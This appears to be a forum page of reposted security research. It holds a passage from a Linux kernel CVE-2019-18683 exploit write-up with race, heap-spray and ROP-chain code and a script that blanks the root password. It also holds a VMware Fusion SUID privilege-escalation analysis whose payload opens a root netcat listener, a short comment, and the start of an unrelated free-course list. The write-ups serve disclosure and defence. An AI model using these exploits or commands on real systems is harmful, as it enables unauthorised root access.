detecting such API misuse. But Steven Rostedt described that this is a known and intended side effect. So I came back with another patch that improves the schedule_timeout() annotation and describes its behavior more explicitly. That patch is scheduled for the mainline. It turned out that sleeping is not so easy sometimes Now let's talk about exploitation. Winning the race As described earlier, vivid_stop_generating_vid_cap() is called upon streaming stop. It unlocks the device mutex in the hope that vivid_thread_vid_cap() running in the kthread will lock it and exit the loop. Achieving memory corruption requires winning the race against this kthread. Please see the code of the PoC crasher. If you want to test it on a vulnerable kernel, ensure that: The vivid driver is loaded. /dev/video0 is the V4L2 capture device (see the kernel logs). You are logged in (Ubuntu applies the RW ACL that I mentioned already). It creates two pthreads. They are bound to separate CPUs using sched_setaffinity for better racing: cpu_set_t single_cpu; CPU_ZERO(&single_cpu); CPU_SET(cpu_n, &single_cpu); ret = sched_setaffinity(0, sizeof(single_cpu), &single_cpu); if (ret != 0) err_exit("[-] sched_setaffinity for a single CPU"); Here is the main part where the racing happens: for (loop = 0; loop < LOOP_N; loop++) { int fd = 0; fd = open("/dev/video0", O_RDWR); if (fd < 0) err_exit("[-] open /dev/video0"); read(fd, buf, 0xfffded); close(fd); } vid_cap_start_streaming(), which starts streaming, is called by V4L2 during vb2_core_streamon() on first reading from the opened file descriptor. vivid_stop_generating_vid_cap(), which stops streaming, is called by V4L2 during __vb2_queue_cancel() on release of the last reference to the file. If another reading "wins" the race against the kthread, it calls vb2_core_qbuf(), which adds an unexpected vb2_buffer to vb2_queue.queued_list. This is how memory corruption begins. Deceived V4L2 subsystem Meanwhile, streaming has fully stopped. The last reference to /dev/video0 is released and the V4L2 subsystem calls vb2_core_queue_release(), which is responsible for freeing up resources. It in turn calls __vb2_queue_free(), which frees our vb2_buffer that was added to the queue when the exploit won the race. But the driver is not aware of this and still holds the reference to the freed object. When streaming is started again on the next exploit loop, vivid driver touches the freed object that is caught by KASAN: ================================================================== BUG: KASAN: use-after-free in vid_cap_buf_queue+0x188/0x1c0 Write of size 8 at addr ffff8880798223a0 by task v4l2-crasher/300 CPU: 1 PID: 300 Comm: v4l2-crasher Tainted: G W 5.4.0-rc2+ #3 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS ?-20190727_073836-buildvm-ppc64le-16.ppc.fedoraproject.org-3.fc31 04/01/2014 Call Trace: dump_stack+0x5b/0x90 print_address_description.constprop.0+0x16/0x200 ? vid_cap_buf_queue+0x188/0x1c0 ? vid_cap_buf_queue+0x188/0x1c0 __kasan_report.cold+0x1a/0x41 ? vid_cap_buf_queue+0x188/0x1c0 kasan_report+0xe/0x20 vid_cap_buf_queue+0x188/0x1c0 vb2_start_streaming+0x222/0x460 vb2_core_streamon+0x111/0x240 __vb2_init_fileio+0x816/0xa30 __vb2_perform_fileio+0xa88/0x1120 ? kmsg_dump_rewind_nolock+0xd4/0xd4 ? vb2_thread_start+0x300/0x300 ? __mutex_lock_interruptible_slowpath+0x10/0x10 vb2_fop_read+0x249/0x3e0 v4l2_read+0x1bf/0x240 vfs_read+0xf6/0x2d0 ksys_read+0xe8/0x1c0 ? kernel_write+0x120/0x120 ? __ia32_sys_nanosleep_time32+0x1c0/0x1c0 ? do_user_addr_fault+0x433/0x8d0 do_syscall_64+0x89/0x2e0 ? prepare_exit_to_usermode+0xec/0x190 entry_SYSCALL_64_after_hwframe+0x44/0xa9 RIP: 0033:0x7f3a8ec8222d Code: c1 20 00 00 75 10 b8 00 00 00 00 0f 05 48 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 4e fc ff ff 48 89 04 24 b8 00 00 00 00 0f 05 <48> 8b 3c 24 48 89 c2 e8 97 fc ff ff 48 89 d0 48 83 c4 08 48 3d 01 RSP: 002b:00007f3a8d0d0e80 EFLAGS: 00000293 ORIG_RAX: 0000000000000000 RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f3a8ec8222d RDX: 0000000000fffded RSI: 00007f3a8d8d3000 RDI: 0000000000000003 RBP: 00007f3a8d0d0f50 R08: 0000000000000001 R09: 0000000000000026 R10: 000000000000060e R11: 0000000000000293 R12: 00007ffc8d26495e R13: 00007ffc8d26495f R14: 00007f3a8c8d1000 R15: 0000000000000003 Allocated by task 299: save_stack+0x1b/0x80 __kasan_kmalloc.constprop.0+0xc2/0xd0 __vb2_queue_alloc+0xd9/0xf20 vb2_core_reqbufs+0x569/0xb10 __vb2_init_fileio+0x359/0xa30 __vb2_perform_fileio+0xa88/0x1120 vb2_fop_read+0x249/0x3e0 v4l2_read+0x1bf/0x240 vfs_read+0xf6/0x2d0 ksys_read+0xe8/0x1c0 do_syscall_64+0x89/0x2e0 entry_SYSCALL_64_after_hwframe+0x44/0xa9 Freed by task 300: save_stack+0x1b/0x80 __kasan_slab_free+0x12c/0x170 kfree+0x90/0x240 __vb2_queue_free+0x686/0x7b0 vb2_core_reqbufs.cold+0x1d/0x8a __vb2_cleanup_fileio+0xe9/0x140 vb2_core_queue_release+0x12/0x70 _vb2_fop_release+0x20d/0x290 v4l2_release+0x295/0x330 __fput+0x245/0x780 task_work_run+0x126/0x1b0 exit_to_usermode_loop+0x102/0x120 do_syscall_64+0x234/0x2e0 entry_SYSCALL_64_after_hwframe+0x44/0xa9 The buggy address belongs to the object at ffff888079822000 which belongs to the cache kmalloc-1k of size 1024 The buggy address is located 928 bytes inside of 1024-byte region [ffff888079822000, ffff888079822400) The buggy address belongs to the page: page:ffffea0001e60800 refcount:1 mapcount:0 mapping:ffff88802dc03180 index:0xffff888079827800 compound_mapcount: 0 flags: 0x500000000010200(slab|head) raw: 0500000000010200 ffffea0001e77c00 0000000200000002 ffff88802dc03180 raw: ffff888079827800 000000008010000c 00000001ffffffff 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff888079822280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff888079822300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb >ffff888079822380: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ^ ffff888079822400: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ffff888079822480: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc ================================================================== As you can see from this report, use-after-free happens on the object from the kmalloc-1k cache. That object is relatively big, so its slab cache is not so heavily used in the kernel. That makes heap spraying more precise (good for exploitation). Heap spraying Heap spraying is an exploitation technique that aims to put controlled bytes at a predetermined memory location on the heap. Heap spraying usually involves allocating multiple heap objects with controlled contents and abusing some allocator behavior pattern. Heap spraying for exploiting use-after-free in the Linux kernel relies on the fact that on kmalloc(), the slab allocator returns the address to the memory that was recently freed (for better performance). Allocating a kernel object with the same size and controlled contents allows overwriting the vulnerable freed object: There is an excellent post by Vitaly Nikolenko, in which he shares a very powerful technique that uses userfaultfd() and setxattr() for exploiting use-after-free in the Linux kernel. I highly recommend reading that article before proceeding with my write-up. The main idea is that userfaultfd() gives you control over the lifetime of data that is allocated by setxattr() in the kernelspace. I used that trick in various forms for exploiting this vulnerability. As I described earlier, the vb2_buffer is freed on streaming stop and is used later, on the next streaming start. That is very convenient -- my heap spray can simply go at the end of the racing loop iteration! But there is one catch: the vulnerable vb2_buffer is not the last one freed by __vb2_queue_free(). In other words, the next kmalloc() doesn't return the needed pointer. That's why having only one allocation is not enough for overwriting the vulnerable object, making it important to really "spray". That is not so easy with Vitaly's technique: the spraying process with setxattr() hangs until the userfaultfd() page fault handler calls the UFFDIO_COPY ioctl. If we want the setxattr() allocations to be persistent, we should never call this ioctl. I bypassed that restriction by creating a pool of pthreads: each spraying pthread calls setxattr() powered by userfaultfd()and hangs. I also distribute spraying pthreads among different CPUs using sched_setaffinity() to make allocations in all slab caches (they are per-CPU). And now let's continue with describing the payload that I created for overwriting the vulnerable vb2_buffer. I'm going to tell you about the development of the payload in chronological order. Control flow hijack for V4L2 subsystem V4L2 is a very complex Linux kernel subsystem. The following diagram (not to scale) describes the relationships between the objects that are part of the subsystem: After my heap spray started to work fine, I spent a lot of (painful) time searching for a good exploit primitive that I could get with a vb2_buffer under my control. Unfortunately, I didn't manage to create an arbitrary write by crafting vb2_buffer.planes. Later I found a promising function pointer: vb2_buffer.vb2_queue->mem_ops->vaddr. Its prototype is pure luxury, I'd say! Moreover, when vaddr() is called, it takes vb2_buffer.planes[0].mem_priv as an argument. Unexpected troubles: kthread context After discovering vb2_mem_ops.vaddr I started to investigate the minimal payload needed for me to get the V4L2 code to reach this function pointer. First of all I disabled SMAP (Supervisor Mode Access Prevention), SMEP (Supervisor Mode Execution Prevention), and KPTI (Kernel Page-Table Isolation). Then I made vb2_buffer.vb2_queue point to the mmap'ed memory area in the userspace. Dereferencing that pointer was giving an error: "unable to handle page fault". It turned out that the pointer is dereferenced in the kernel thread context, where my userspace is not mapped at all. So constructing the payload became a sticking point: I needed to place vb2_queue and vb2_mem_ops at known memory addresses that can be accessed from the kthread context. Insight -- that's why we do it During these experiments I dropped my kernel code changes that I had developed for deeper fuzzing. And I saw that my PoC exploit hit some V4L2 warning before performing use-after-free. This is the code in __vb2_queue_cancel() that gives the warning: /* * If you see this warning, then the driver isn't cleaning up properly * in stop_streaming(). See the stop_streaming() documentation in * videobuf2-core.h for more information how buffers should be returned * to vb2 in stop_streaming(). */ if (WARN_ON(atomic_read(&q->owned_by_drv_count))) { I realized that I could parse the kernel warning information (which is available to regular users on Ubuntu Server). But I didn't know what to do with it. After some time I decided to ask my friend Andrey Konovalov aka xairy who is a well-known Linux kernel security researcher. He presented me with a cool idea -- to put the payload on the kernel stack and hold it there using userfaultfd(), similarly to Vitaly's heap spray. We can do this with any syscall that moves data to the kernel stack using copy_from_user(). I believe this to be a novel technique, so I will refer it to as xairy's method to credit my friend. I understood that I could get the kernel stack location by parsing the warning and then anticipate the future address of my payload. This was the most sublime moment of my entire quest. These are the moments that make all the effort worth it, right? Now let's collect all the exploit steps together before describing the payload bytes. The described method allows bypassing SMAP, SMEP, and KASLR on Ubuntu Server 18.04. Exploit orchestra For this quite complex exploit I created a pool of pthreads and orchestrated them using synchronization at pthread_barriers. Here are the pthread_barriers that mark the main reference points during exploitation: #define err_exit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) #define THREADS_N 50 pthread_barrier_t barrier_prepare; pthread_barrier_t barrier_race; pthread_barrier_t barrier_parse; pthread_barrier_t barrier_kstack; pthread_barrier_t barrier_spray; pthread_barrier_t barrier_fatality; ... ret = pthread_barrier_init(&barrier_prepare, NULL, THREADS_N - 3); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_race, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_parse, NULL, 3); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_kstack, NULL, 3); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_spray, NULL, THREADS_N - 5); if (ret != 0) err_exit("[-] pthread_barrier_init"); ret = pthread_barrier_init(&barrier_fatality, NULL, 2); if (ret != 0) err_exit("[-] pthread_barrier_init"); Each pthread has a special role. In this particular exploit I have 50 pthreads in five different roles: 2 racer pthreads (THREADS_N - 6) = 44 sprayer pthreads, which hang on setxattr() powered by userfaultfd() 2 pthreads for userfaultfd() page fault handling 1 pthread for parsing /dev/kmsg and adapting the payload 1 fatality pthread, which triggers the privilege escalation The pthreads with different roles synchronize at a different set of barriers. The last parameter of pthread_barrier_init() specifies the number of pthreads that must call pthread_barrier_wait() for that particular barrier before they can continue all together. The following table describes all the pthreads of this exploit, their work, and synchronization via pthread_barrier_wait(). The barriers are listed in chronological order. The table is best read row by row, remembering that all the pthreads work in parallel. Here is the exploit debug output perfectly demonstrating the workflow described in the table: a13x@ubuntu_server_1804:~$ uname -a Linux ubuntu_server_1804 4.15.0-66-generic #75-Ubuntu SMP Tue Oct 1 05:24:09 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux a13x@ubuntu_server_1804:~$ a13x@ubuntu_server_1804:~$ ./v4l2-pwn begin as: uid=1000, euid=1000 Prepare the payload: [+] payload for_heap is mmaped to 0x7f8c9e9b0000 [+] vivid_buffer of size 504 is at 0x7f8c9e9b0e08 [+] payload for_stack is mmaped to 0x7f8c9e9ae000 [+] timex of size 208 is at 0x7f8c9e9aef38 [+] userfaultfd #1 is configured: start 0x7f8c9e9b1000, len 0x1000 [+] userfaultfd #2 is configured: start 0x7f8c9e9af000, len 0x1000 We have 4 CPUs for racing; now create 50 pthreads... [+] racer 1 is ready on CPU 1 [+] fatality is ready [+] racer 0 is ready on CPU 0 [+] fault_handler for uffd 3 is ready [+] kmsg parser is ready [+] fault_handler for uffd 4 is ready [+] 44 sprayers are ready (passed the barrier) Racer 1: GO! Racer 0: GO! [+] found rsp "ffffb93600eefd60" in kmsg [+] kernel stack top is 0xffffb93600ef0000 [+] found r11 "ffffffff9d15d80d" in kmsg [+] kaslr_offset is 0x1a800000 Adapt payloads knowing that kstack is 0xffffb93600ef0000, kaslr_offset 0x1a800000: vb2_queue of size 560 will be at 0xffffb93600eefe30, userspace 0x7f8c9e9aef38 mem_ops ptr will be at 0xffffb93600eefe68, userspace 0x7f8c9e9aef70, value 0xffffb93600eefe70 mem_ops struct of size 120 will be at 0xffffb93600eefe70, userspace 0x7f8c9e9aef78, vaddr 0xffffffff9bc725f1 at 0x7f8c9e9aefd0 rop chain will be at 0xffffb93600eefe80, userspace 0x7f8c9e9aef88 cmd will be at ffffb93600eefedc, userspace 0x7f8c9e9aefe4 [+] the payload for kernel heap and stack is ready. Put it. [+] UFFD_EVENT_PAGEFAULT for uffd 4 on address = 0x7f8c9e9af000: 2 faults collected [+] fault_handler for uffd 4 passed the barrier [+] UFFD_EVENT_PAGEFAULT for uffd 3 on address = 0x7f8c9e9b1000: 44 faults collected [+] fault_handler for uffd 3 passed the barrier [+] and now fatality: run the shell command as root! Anatomy of the exploit payload In the previous section, I described orchestration of the exploit pthreads. I mentioned that the exploit payload is created in two locations: In the kernel heap by sprayer pthreads using setxattr() syscall powered by userfaultfd(). In the kernel stack by racer pthreads using adjtimex() syscall powered by userfaultfd(). That syscall is chosen because it performs copy_from_user() to the kernel stack. The exploit payload consists of three parts: vb2_buffer in kernel heap vb2_queue in kernel stack vb2_mem_ops in kernel stack Now see the code that creates this payload. At the beginning of the exploit, I prepare the payload contents in the userspace. That memory is for the setxattr() syscall, which will put it on the kernel heap: #define MMAP_SZ 0x2000 #define PAYLOAD_SZ 504 void init_heap_payload() { struct vivid_buffer *vbuf = NULL; struct vb2_plane *vplane = NULL; for_heap = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (for_heap == MAP_FAILED) err_exit("[-] mmap"); printf(" [+] payload for_heap is mmaped to %p\n", for_heap); /* Don't touch the second page (needed for userfaultfd) */ memset(for_heap, 0, PAGE_SIZE); xattr_addr = for_heap + PAGE_SIZE - PAYLOAD_SZ; vbuf = (struct vivid_buffer *)xattr_addr; vbuf->vb.vb2_buf.num_planes = 1; vplane = vbuf->vb.vb2_buf.planes; vplane->bytesused = 16; vplane->length = 16; vplane->min_length = 16; printf(" [+] vivid_buffer of size %lu is at %p\n", sizeof(struct vivid_buffer), vbuf); And that memory is for the adjtimex() syscall, which will put it on the kernel stack: #define PAYLOAD2_SZ 208 void init_stack_payload() { for_stack = mmap(NULL, MMAP_SZ, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0); if (for_stack == MAP_FAILED) err_exit("[-] mmap"); printf(" [+] payload for_stack is mmaped to %p\n", for_stack); /* Don't touch the second page (needed for userfaultfd) */ memset(for_stack, 0, PAGE_SIZE); timex_addr = for_stack + PAGE_SIZE - PAYLOAD2_SZ + 8; printf(" [+] timex of size %lu is at %p\n", sizeof(struct timex), timex_addr); } As I described earlier, after hitting the race condition the kmsg parsing pthread extracts the following information from the kernel warning: The RSP value to calculate the address of kernel stack top. The R11 value that points to some constant location in the kernel code. This value helps to calculate the KASLR offset: #define R11_COMPONENT_TO_KASLR_OFFSET 0x195d80d #define KERNEL_TEXT_BASE 0xffffffff81000000 kaslr_offset = strtoul(r11, NULL, 16); kaslr_offset -= R11_COMPONENT_TO_KASLR_OFFSET; if (kaslr_offset < KERNEL_TEXT_BASE) { printf("bad kernel text base 0x%lx\n", kaslr_offset); err_exit("[-] kmsg parsing for r11"); } kaslr_offset -= KERNEL_TEXT_BASE; Then the kmsg parsing pthread adapts the heap and stack payload. The most interesting and complex part! To understand it have a look at the debug output of this code (posted above). #define TIMEX_STACK_OFFSET 0x1d0 #define LIST_OFFSET 24 #define OPS_OFFSET 64 #define CMD_OFFSET 172 struct vivid_buffer *vbuf = (struct vivid_buffer *)xattr_addr; struct vb2_queue *vq = NULL; struct vb2_mem_ops *memops = NULL; struct vb2_plane *vplane = NULL; printf("Adapt payloads knowing that kstack is 0x%lx, kaslr_offset 0x%lx:\n", kstack, kaslr_offset); /* point to future position of vb2_queue in timex payload on kernel stack */ vbuf->vb.vb2_buf.vb2_queue = (struct vb2_queue *)(kstack - TIMEX_STACK_OFFSET); vq = (struct vb2_queue *)timex_addr; printf(" vb2_queue of size %lu will be at %p, userspace %p\n", sizeof(struct vb2_queue), vbuf->vb.vb2_buf.vb2_queue, vq); /* just to survive vivid list operations */ vbuf->list.next = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET); vbuf->list.prev = (struct list_head *)(kstack - TIMEX_STACK_OFFSET + LIST_OFFSET); /* * point to future position of vb2_mem_ops in timex payload on kernel stack; * mem_ops offset is 0x38, be careful with OPS_OFFSET */ vq->mem_ops = (struct vb2_mem_ops *)(kstack - TIMEX_STACK_OFFSET + OPS_OFFSET); printf(" mem_ops ptr will be at %p, userspace %p, value %p\n", &(vbuf->vb.vb2_buf.vb2_queue->mem_ops), &(vq->mem_ops), vq->mem_ops); memops = (struct vb2_mem_ops *)(timex_addr + OPS_OFFSET); /* vaddr offset is 0x58, be careful with ROP_CHAIN_OFFSET */ memops->vaddr = (void *)ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET + kaslr_offset; printf(" mem_ops struct of size %lu will be at %p, userspace %p, vaddr %p at %p\n", sizeof(struct vb2_mem_ops), vq->mem_ops, memops, memops->vaddr, &(memops->vaddr)); And the following diagram describes how the adapted payload parts are interconnected in the kernel memory: ROP'n'JOP Now I'm going to tell about the ROP chain that I created for these special circumstances. As you can see, I've found an excellent stack-pivoting gadget that fits to void *(*vaddr)(void *buf_priv, where the control flow is hijacked. The buf_priv argument is taken from the vb2_plane.mem_priv, which is under our control. In the Linux kernel on x86_64, the first function argument is passed via the RDI register. So the sequence push rdi; pop rsp switches the stack pointer to the controlled location (it is on the kernel stack as well, so SMAP and SMEP are bypassed). Then comes the ROP chain for local privilege escalation. It is unusual because it is executed in the kernel thread context (as described earlier in this write-up). #define ROP__PUSH_RDI__POP_RSP__pop_rbp__or_eax_edx__RET 0xffffffff814725f1 #define ROP__POP_R15__RET 0xffffffff81084ecf #define ROP__POP_RDI__RET 0xffffffff8101ef05 #define ROP__JMP_R15 0xffffffff81c071be #define ADDR_RUN_CMD 0xffffffff810b4ed0 #define ADDR_DO_TASK_DEAD 0xffffffff810bf260 unsigned long *rop = NULL; char *cmd = "/bin/sh /home/a13x/pwn"; /* rewrites /etc/passwd dropping root pwd */ size_t cmdlen = strlen(cmd) + 1; /* for 0 byte */ /* mem_priv is the arg for vaddr() */ vplane = vbuf->vb.vb2_buf.planes; vplane->mem_priv = (void *)(kstack - TIMEX_STACK_OFFSET + ROP_CHAIN_OFFSET); rop = (unsigned long *)(timex_addr + ROP_CHAIN_OFFSET); printf(" rop chain will be at %p, userspace %p\n", vplane->mem_priv, rop); strncpy((char *)timex_addr + CMD_OFFSET, cmd, cmdlen); printf(" cmd will be at %lx, userspace %p\n", (kstack - TIMEX_STACK_OFFSET + CMD_OFFSET), (char *)timex_addr + CMD_OFFSET); /* stack will be trashed near rop chain, be careful with CMD_OFFSET */ *rop++ = 0x1337133713371337; /* placeholder for pop rbp in the pivoting gadget */ *rop++ = ROP__POP_R15__RET + kaslr_offset; *rop++ = ADDR_RUN_CMD + kaslr_offset; *rop++ = ROP__POP_RDI__RET + kaslr_offset; *rop++ = (unsigned long)(kstack - TIMEX_STACK_OFFSET + CMD_OFFSET); *rop++ = ROP__JMP_R15 + kaslr_offset; *rop++ = ROP__POP_R15__RET + kaslr_offset; *rop++ = ADDR_DO_TASK_DEAD + kaslr_offset; *rop++ = ROP__JMP_R15 + kaslr_offset; printf(" [+] the payload for kernel heap and stack is ready. Put it.\n"); This ROP chain loads the address of the kernel function run_cmd() from kernel/reboot.c to the R15 register. Then it saves the address of the shell command to the RDI register. That address will be passed to run_cmd() as an argument. Then the ROP chain performs some JOP'ing It jumps to run_cmd() that executes /bin/sh /home/a13x/pwn with root privileges. That script rewrites /etc/passwd allowing to login as root without a password: #!/bin/sh # drop root password sed -i '1s/.*/root::0:0:root:\/root:\/bin\/bash/' /etc/passwd Then the ROP chain jumps to __noreturn do_task_dead() from kernel/exit.c. I do so for so-called system fixating: if this kthread is not stopped, it provokes some unnecessary kernel crashes. Possible exploit mitigation There are several kernel hardening features that could interfere with different parts of this exploit. 1. Setting /proc/sys/vm/unprivileged_userfaultfd to 0 would block the described method of keeping the payload in the kernelspace. That toggle restricts userfaultfd() to only privileged users (with SYS_CAP_PTRACE capability). 2. Setting kernel.dmesg_restrict sysctl to 1 would block the infoleak via kernel log. That sysctl restricts the ability of unprivileged users to read the kernel syslog via dmesg. However, even with kernel.dmesg_restrict = 1, Ubuntu users from the adm group can read the kernel log from /var/log/syslog. 3. grsecurity/PaX patch has an interesting feature called PAX_RANDKSTACK, which would make the exploit guess the vb2_queue location: +config PAX_RANDKSTACK + bool "Randomize kernel stack base" + default y if GRKERNSEC_CONFIG_AUTO && !(GRKERNSEC_CONFIG_VIRT_HOST && GRKERNSEC_CONFIG_VIRT_VIRTUALBOX) + depends on X86_TSC && X86 + help + By saying Y here the kernel will randomize every task's kernel + stack on every system call. This will not only force an attacker + to guess it but also prevent him from making use of possible + leaked information about it. + + Since the kernel stack is a rather scarce resource, randomization + may cause unexpected stack overflows, therefore you should very + carefully test your system. Note that once enabled in the kernel + configuration, this feature cannot be disabled on a per file basis. + 4. PAX_RAP from grsecurity/PaX patch should prevent my ROP/JOP chain that is described above. 5. Hopefully in future Linux kernel will have ARM Memory Tagging Extension (MTE) support, which will mitigate use-after-free similar to one I exploited. Conclusion Investigating and fixing CVE-2019-18683, developing the PoC exploit, and writing this article has been a big deal for me. I hope you have enjoyed reading it. I want to thank Positive Technologies for giving me the opportunity to work on this research. I would appreciate the feedback. Author: Alexander Popov, Positive Technologies Author Positive Research at 7:23 AM Sursa: http://blog.ptsecurity.com/2020/03/cve-2019-18683-exploiting-linux-kernel.html

Analyzing SUID Binaries March 17, 2020 GRIMM Analyzing SUID Binaries In our spare time, we hunt for bugs in various pieces of software. Thus, when winding down from a project recently, we decided it might be fun to audit one of our own laptops to see if we can locate a local privilege escalation (LPE) vulnerability in the software we use every day. This blog post describes the process for: scanning a MacBook Pro to find a target, conducting dynamic analysis with dtruss, analyzing the binary to determine the root cause, and bypassing the binary’s restrictions to obtain root privileges. The write-up and the code for the vulnerability described in this blog post can be found on our NotQuite0DayFriday repository here: https://github.com/grimm-co/NotQuite0DayFriday/tree/master/2020.03.17-vmware-fusion Finding Targets LPE vulnerabilities come in many shapes and sizes, such as kernel vulnerabilities, vulnerabilities in privileged services, and vulnerabilities in SUID binaries. As described in our previous blog post, kernel exploits have additional complexities to ensure they don’t accidentally crash the computer being exploited. On the other hand, SUID binaries are a much more compelling target as they run as root regardless of the user that executes the binary and vulnerabilities in SUID binaries will rarely crash the computer. Additionally, it is not uncommon for third-party vendors to implement SUID binary helper programs without taking the necessary security precautions. SUID binaries must protect themselves from local attackers, and thus must take into account a substantially different threat model than most software. When choosing a target for the challenge, we started by searching the laptop for SUID binaries with a simple find command: Figure 1. Third-party SUID Applications on the author’s MacBook Pro We chose to focus on SUID binaries within the /Applications directory to ensure we would only find SUID binaries in third-party applications. The SUID binaries included with the base system are generally of a higher quality, and thus less likely to have many shallow bugs. As such, we proceeded with analyzing the found VMware Fusion and VirtualBox SUID binaries. A Nice Surprise We decided to trace the executables with dtruss, a dtrace helper utility. Dtruss will show us the syscalls that a binary executes, similar to strace on Linux. # Copy the SUID binaries to a single directory (and remove spaces) bash-3.2$ find /Applications/ -perm +6000 -exec /bin/sh -c 'cp "{}" $(basename "{}"|sed "s/ /_/g")' \; # Run each of the binaries in dtruss and record their syscalls bash-3.2$ for i in *; do sudo dtruss -f ./$i 2>&1 | tee /tmp/trace_$i.txt; done Next, we looked through each of the syscalls lists for indicators of the mistakes typically made within SUID binaries. Since SUID binaries are run as root, they must ensure that they only load trusted libraries and only run trusted executables. As such, we used grep to look for any execve syscalls and any open syscalls with the filename ending in dylib (the extension for a library on macOS): Figure 2. The execve and open calls in the Third-party SUID Applications Looking at the results, we noticed that the Open VMWare Fusion Services and Open VMware USB Arbitrator Service executables, which we’ve copied to a subfolder in a home directory, are trying to run non-existent executables. Also the vmware-authd, vmware-vmx, vmware-vmx-debug, and vmware-vmx-stats executables are trying to load a non-existent libcrypto.1.0.2.dylib library. From the list of executed syscalls, it appeared that the VMWare SUID binaries are having trouble locating the other VMWare libraries and executables. A Journey Through IDA In order to figure out what was happening in these binaries, we began analyzing them in IDA. The two Opener daemons follow a similar code path, so we will only describe the Open VMware USB Arbitrator Service daemon here. The Hex-Rays decompiler output shown below is the executable’s main function. Figure 3. The main function of the Open VMware USB Arbitrator Service daemon This function makes three main function calls. The Location_Init function looks up the tool name “usbarb-opener” in a list of tools (shown below). The number associated with the tool name is saved to the NumberOfUpCounts global variable which is later used in the LocationGetRoot function. Figure 4. The list of tools in the Open VMware USB Arbitrator Service daemon Similarly, the LocationGetRoot function looks up the “usbarbDaemonFile” string in a separate list to find the relative path to the VMware USB Arbitrary Service executable. Figure 5. The tool path prefix list in the Open VMware USB Arbitrator Service daemon Then the LocationGetRoot function, as shown below, calls the HostInfo_GetModulePath function. This function is a simple wrapper around _NSGetExecutablePath and returns the file path of the main executable. When the executable is in the normal VMware directory, this will return the string “/Applications/VMware Fusion.app/Contents/Library/services/Open VMware USB Arbitrator Service”. Next, it calls resolve_realpath, a wrapper around the realpath function, to resolve any symbolic links in the file path. The function then uses the while loop to repeatedly remove the last four slashes in the file path, where four is taken from the global variable NumberOfUpCounts, set in Location_Init previously. Thus, it is finding the third parent directory of the executable’s directory. In a typical execution, this while loop will produce the string “/Applications/VMware Fusion.app”. Lastly, the function returns the combined parent directory and relative path to produce the string, “/Applications/VMware Fusion.app/Contents/Library/services/VMware USB Arbitrator Service”. Figure 6. The directory traversal bug in the Open VMware USB Arbitrator Service daemon The final call in the main function is to serviceImpl, which uses the returned path to start the USB service without performing any other verification on the path. Fooling _NSGetExecutablePath and realpath As we saw in the previous section, the two Opener daemons will try to run a program relative to the Opener daemon’s path. Thus, if we can find a way to run the Opener daemon from another location, we can make the SUID daemon execute an arbitrary program. In the dtruss example, we copied the Opener daemons to the home directory. However, when a SUID binary is copied, it loses its SUID status. Additionally, unprivileged users lack the ability to move the executable. Furthermore, symbolic links will be resolved by the realpath call, and thus they will not trick the programs into using the symbolic link’s location. However, unlike Linux, macOS allows unprivileged users to create hard links to SUID executables. As hard links are not resolved by realpath, the Opener daemons will be fooled into using an incorrect directory. GRIMM’s NotQuite0DayFriday repository on GitHub contains two exploits for this vulnerability, which create the expected directory layout, compile a payload, hard link to the SUID Openers, and then execute the hard link to run the payload as root. The example payload for this exploit starts a netcat listener as root on TCP port 3333. Figure 7. Example output of the bug being used to obtain root privileges Conclusion SUID binaries provide an easy way for developers to allow unprivileged users to call their privileged application. However, without adequate security, they can provide the means for an attacker to escalate privileges and takeover a computer. As such, SUID binaries should be avoided whenever possible and heavily audited when required. This post illustrates how a slight deviation from the expected behavior resulted in a directory traversal vulnerability that an attacker could exploit to obtain root privileges. Want to join us and exploit some binaries? We’re hiring. Need help auditing or exploiting your binaries? Feel free to contact us. Sursa: https://blog.grimm-co.com/post/analyzing-suid-binaries/

Nu stiu de ce, dar am tendinta sa ma indoiesc de credibilitatea acestor informatii.

190 universities just launched 600 free online courses. Here’s the full list. Dhawal Shah Oct 9th, 2018 Facebook Twitter Envelope Url 50 If you haven’t heard, universities around the world offering their courses online for free (or at-least partially free). These courses are collectively called as MOOCS or Massive Open Online Courses. In the past seven years or so, over 800 universities have created around 10,000 of these MOOCs. And I’ve been keeping track of these MOOCs the entire time here at Class Central, ever since they rose to prominence. In the past four months alone, 190 universities have announced 600 such free online courses. I’ve compiled this list below and categorized the courses into the following subjects: Computer Science, Mathematics, Programming, Data Science, Humanities, Social Sciences, Education & Teaching, Health & Medicine, Business, Personal Development, Engineering, Art & Design, and finally Science. Here’s the full list of new free online courses. Most of these are completely self-paced, so you can start taking them at your convenience. PROGRAMMING CS50’s Introduction to Game Development from Harvard University CS50’s Mobile App Development with React Native from Harvard University CS50’s Web Programming with Python and JavaScript from Harvard University Functions, Methods, and Interfaces in Go from University of California, Irvine Concurrency in Go from University of California, Irvine Getting Started with Go from University of California, Irvine Computing in Python I: Fundamentals and Procedural Programming from Georgia Institute of Technology Computing in Python IV: Objects & Algorithms from Georgia Institute of Technology Computing in Python III: Data Structures from Georgia Institute of Technology Computing in Python II: Control Structures from Georgia Institute of Technology Projet de programmation (en Java) from École Polytechnique Fédérale de Lausanne Pixel Art for Video Games from Michigan State University Web Design: Strategy and Information Architecture from California Institute of the Arts Front-End Web Development with React from The Hong Kong University of Science and Technology Multiplatform Mobile App Development with React Native from The Hong Kong 